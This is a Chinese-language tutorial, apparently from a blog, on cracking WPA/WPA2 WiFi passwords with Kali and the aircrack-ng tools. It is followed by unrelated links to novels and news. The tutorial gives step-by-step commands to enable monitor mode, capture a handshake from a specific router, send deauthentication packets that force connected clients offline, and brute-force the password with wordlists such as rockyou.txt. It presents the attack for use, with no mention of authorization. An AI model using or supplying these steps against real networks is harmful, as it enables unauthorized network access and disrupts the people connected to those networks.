今日主题:如何破解WIFI
准备工具
•笔记本一台
•usb无线网卡【我用的是小米的】
•kali系统【可以在虚拟机里装,建议用2019年及以下版本
VMware Workstation15虚拟机安装
可以参考
https://www.jianshu.com/p/552179808ebf
kali安装
可以参考
https://www.cnblogs.com/changjue/p/11244585.html
WIFI加密方式
1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。
2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。
start
一
打开虚拟机,插入usb网卡,把网卡放到虚拟机来

桌面右键,选择Open in Terminal打开终端

二
显示网卡信息
airmon-ng

开启网卡监控
airmon-ng start wlan0

用ifconfig命令查看一下网卡信息
ifconfig
可以看到网卡的名字已经变了

三
扫描WIFI信号
airodump-ng wlan0mon

拿到握手包
airodump-ng -w freedom -c 11 -–bssid 44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one
解释:
-c:指定信道[ch]
-w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字
--bssid:指定路由器的MAC

再开一个终端输入命令
aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon – -ignore-negative-one
使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包
解释:
-0:指定发送反认证包的个数(阿利伯数字0)
-a:指定路由器的MAC
-c:指定客户机的MAC

出现下图就是抓取成功

破解握手包
aircrack-ng -w dict freedom-*.cap
dict:字典的名字
freedom-*.cap:握手包
破解成功

补充
•系统自带了密码字典,我用的是我自己的
字典位置如下:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists/rockyou.txt
最后一个路径下的文件默认是压缩的,可以通过以下命令解压

•反向认证的原理是让其中一个客户端下线,然后他再次连接,就可以获取握手包•信号扫描结束或者进程终止:ctrl+c
相关文章:
(番外)+(结局)苏夏霍寒:结局+番外_(苏夏霍寒:结局+番外)最新章节列表_笔趣阁(待到山花烂漫时)04-21
信阳市气象台发布雷暴大风黄色预警[III级/较重] 【2025-04-21】04-21
小说被京圈神女冷落十年后我成了夜店浪子(被京圈神女冷落十年后我成了夜店浪子)已更新+无删减(孟扶摇睿渊)04-21
孟扶摇睿渊:+番外+后续在线阅读被京圈神女冷落十年后我成了夜店浪子04-21
姜瑜 小说小说全集+延伸+完本(穿书八零假千金混得风生水起姜瑜)畅享在线阅读04-21
许可可小说(摄政王势在必得小官之女插翅难逃)+起点章节(许可可)阅读04-21
“关税战”压不垮义乌!这里的老板们正在上演一场“外贸突围战”04-21
全球首个人形机器人半程马拉松,在北京亦庄正式开跑!参赛机器人选手多达21名,中途没电可更换电池,工程师团队全程陪跑04-21